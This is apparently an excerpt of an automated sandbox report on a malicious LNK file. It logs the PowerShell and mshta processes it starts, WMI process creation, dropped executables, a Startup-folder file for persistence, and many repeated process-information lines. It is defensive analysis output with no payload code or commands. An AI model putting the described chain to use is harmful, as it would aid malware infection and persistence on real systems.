Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\mshta.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exe
Creates processes via WMI
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Drops PE files with a suspicious file extension
Source: C:\Users\Public\Guard.exeFile created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifJump to dropped file
Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\baochuan1[1]Jump to dropped file
Source: C:\Users\Public\Guard.exeFile created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Guard.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Guard.exeJump to dropped file
Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\baochuan1[1]Jump to dropped file

Boot Survival

barindex
Drops PE files to the user root directory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Guard.exeJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB804514 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,15_2_00007FF7BB804514
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
